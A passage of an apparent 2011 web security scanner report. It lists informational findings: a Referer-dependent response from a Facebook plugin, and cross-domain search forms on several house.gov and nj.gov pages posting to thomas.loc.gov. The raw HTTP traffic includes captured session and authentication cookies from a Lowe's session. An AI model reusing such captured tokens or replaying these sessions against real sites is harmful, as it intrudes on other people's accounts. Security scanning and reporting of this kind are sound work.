Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes; akaau=1310524386~id=21017306f05776f813565f0d22f0d790

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 08 Dec 2010 19:23:18 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 1649
Expires: Wed, 13 Jul 2011 02:03:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:12 GMT
Connection: keep-alive
Vary: Accept-Encoding

/**
* Lowes Javascript Library.
*
* This is licensed only for use in providing the Lowes.com service,
* or any part thereof, and is subject to the Lowes.com Terms and Conditions.
* You may not port this file to another platform without Lowes.com's written consent.
*/

/**
* @Package Lowes.MemberGroup
* @Author Wcope
* @version <%=VERSION=%>
*/

(function(){
// Grab Lowes namespace object or create a new one.
var Lowes = window.Lowes || {};

/**
* Simplified Cookie based information for MemberGroups
*/
var MemberGr
...[SNIP]...

10. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.252.73
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:39 GMT
Content-Length: 7938

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1cfc0be72f74979575128" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">16,009,401</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.61
X-Cnection: close
Date: Wed, 13 Jul 2011 01:59:52 GMT
Content-Length: 7879

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1cfc1877f4a9926127751" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">16,009,405</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span
...[SNIP]...

11. Cross-domain POST  previous  next
There are 24 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


11.1. http://buerkle.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buerkle.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: buerkle.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310519430-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Wed, 13 Jul 2011 01:10:30 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:51:41 GMT
Date: Wed, 13 Jul 2011 01:51:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.2. http://buerkle.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buerkle.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: buerkle.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310519430-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Wed, 13 Jul 2011 01:10:30 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:51:41 GMT
Date: Wed, 13 Jul 2011 01:51:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.3. http://clarke.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clarke.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: clarke.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 35396
Content-Type: text/html; charset=utf-8
Expires: Wed, 13 Jul 2011 01:52:10 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:40 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
</h2>
                                               <form action="http://thomas.loc.gov/cgi-bin/query" method="post" class="form" target="_blank">
                                                   <fieldset>
...[SNIP]...

11.4. http://clarke.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clarke.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: clarke.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 35396
Content-Type: text/html; charset=utf-8
Expires: Wed, 13 Jul 2011 01:52:10 GMT
Last-Modified: Wed, 13 Jul 2011 01:51:40 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
</form>
                                               <form action="http://thomas.loc.gov/cgi-bin/query" method="post" class="form" target="_blank">
                                                   <fieldset>
...[SNIP]...

11.5. http://grimm.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grimm.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.6. http://grimm.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grimm.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: grimm.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513333-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:28:53 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.7. http://hanna.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hanna.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: hanna.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513835-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:37:15 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
<div class="block-content" id="billsearch" >

<form name="thomasBill" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.8. http://hanna.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hanna.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: hanna.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Drupal-Cache: HIT
ETag: "1310513835-0"
X-Generator: Drupal 7 (http://drupal.org)
Last-Modified: Tue, 12 Jul 2011 23:37:15 +0000
Vary: Cookie
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=0
Expires: Wed, 13 Jul 2011 01:52:08 GMT
Date: Wed, 13 Jul 2011 01:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
</form>

<form name="thomasText" method="post" action="http://thomas.loc.gov/cgi-bin/thomas" target="_blank">
<p>
...[SNIP]...

11.9. http://israel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://israel.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div id="thomas-top"><form id="billsearch" action="http://thomas.loc.gov/cgi-bin/query" method="post"> <input id="bill" value="Search bill number" onfocus="if(this.value=='Search bill number')this.value=''" onblur="if(this.value=='')this.value='Search bill number'" name="docidc111" class="text" type=
...[SNIP]...

11.10. http://israel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://israel.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div id="thomas-bottom"><form id="billsearch" action="http://thomas.loc.gov/cgi-bin/query" method="post"> <input id="word" value="Search word/phrase" onfocus="if(this.value=='Search word/phrase')this.value=''" onblur="if(this.value=='')this.value='Search word/phrase'" name="queryc112" class="text" type=
...[SNIP]...

11.11. http://nj.gov/nj/includes/styles/slideshow.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nj.gov
Path:   /nj/includes/styles/slideshow.css

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

Request

GET /nj/includes/styles/slideshow.css HTTP/1.1
Host: nj.gov
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:38:26 GMT
Content-length: 4769
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<td width="593" height="90" align="right" valign="top">
<form action="http://search.state.nj.us/query.html" method="post" name="seek" id="seek" >
<table width="100%" border="0" align="right" cellpadding="0" cellspacing="0" class="search">
...[SNIP]...

11.12. http://owens.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://owens.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: owens.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: popup=2; expires=Tue, 08-May-2012 01:52:26 GMT; path=/
Set-Cookie: samesession=true; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta h
...[SNIP]...
</form>
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<div class="other-search-box">
...[SNIP]...

11.13. http://owens.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://owens.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: owens.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: popup=2; expires=Tue, 08-May-2012 01:52:26 GMT; path=/
Set-Cookie: samesession=true; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26444


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta h
...[SNIP]...
<div class="other-search-form">
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<div class="other-search-box">
...[SNIP]...

11.14. http://peteking.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://peteking.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: peteking.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-Length: 15433
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="C
...[SNIP]...
</div>
                               
                               <FORM ACTION="http://thomas.loc.gov/cgi-bin/query" METHOD="POST" id="LForm">
                                   <label>
...[SNIP]...

11.15. http://rangel.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rangel.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: rangel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
Server: U.S. House of Representatives
Date: Wed, 13 Jul 2011 01:53:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-
...[SNIP]...
</h2>
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<p>
...[SNIP]...

11.16. http://tonko.house.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tonko.house.gov
Path:   /

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
